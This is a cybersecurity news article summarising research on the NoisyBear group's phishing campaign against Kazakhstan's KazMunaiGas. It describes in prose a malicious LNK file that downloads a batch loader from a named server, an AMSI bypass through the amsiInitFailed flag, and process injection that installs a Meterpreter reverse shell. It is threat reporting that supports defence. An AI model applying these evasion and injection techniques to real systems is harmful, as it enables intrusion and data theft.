Cybersecurity
A threat actor identified as NoisyBear has emerged, posing a significant threat to Kazakhstan’s energy sector. This group employs advanced tactics, including weaponized ZIP files and PowerShell-based attack chains, to infiltrate critical infrastructure.
NoisyBear targets KazMunaiGas (KMG), the national oil and gas company, through phishing emails that mimic legitimate internal communications regarding salary schedules and policy updates.
The attack methodology involves social engineering, compromising legitimate business email accounts within KazMunaiGas to enhance the authenticity of their communications.
The emails contain ZIP attachments disguised as urgent HR-related documents, creating a false sense of legitimacy and encouraging interaction from employees.
This campaign is sophisticated, using multi-stage payload delivery systems that leverage trusted system binaries and PowerShell execution environments to maintain stealth during the infection process.
Seqrite researchers identified the activities of this threat group in April 2025, with campaigns intensifying in May 2025.
Evidence suggests Russian origins, indicated by Russian language comments within malicious code, use of sanctioned hosting services, and targeting patterns aligned with geopolitical interests in Central Asian energy resources.
Infrastructure analysis reveals connections to Aeza Group LLC, a sanctioned hosting provider, which complicates attribution and takedown efforts.
The malware’s impact includes advanced persistence mechanisms and defense evasion techniques, allowing prolonged network access and potential exposure of sensitive corporate communications and strategic planning documents.
Infection Mechanism and Technical Analysis
The NoisyBear infection chain starts with ZIP files containing a decoy document with the KazMunaiGas logo, a README.txt file with execution instructions, and a weaponized LNK file named “График зарплат.lnk” (Salary Schedule.lnk).
The malicious shortcut file uses PowerShell as a Living Off The Land Binary (LOLBIN) to execute complex download operations.
Upon execution, the LNK file initiates a PowerShell command to retrieve a batch script named “123.bat” from the server “77.239.125.41:8443”.
This script is placed in the C:\Users\Public directory, chosen for its accessibility and reduced security scrutiny.
The batch script functions as a secondary loader, downloading PowerShell scripts referred to as “DOWNSHELL” by researchers.
These loaders employ Anti-Malware Scan Interface (AMSI) bypass techniques, using reflection to manipulate the System.Management.Automation.AmsiUtils class.
The malware sets the “amsiInitiFailed” flag to disable real-time scanning capabilities, allowing subsequent malicious operations.
The final payload involves process injection techniques targeting explorer.exe, using CreateRemoteThread injection methods.
The malware uses OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread API calls to inject Meterpreter reverse shell capabilities, establishing persistent backdoor access for data exfiltration and remote command execution.
-
Expense Apps Add Budgeting for Irregular Incomes
In an era where the gig economy is burgeoning, traditional budgeting methods ... -
-
-
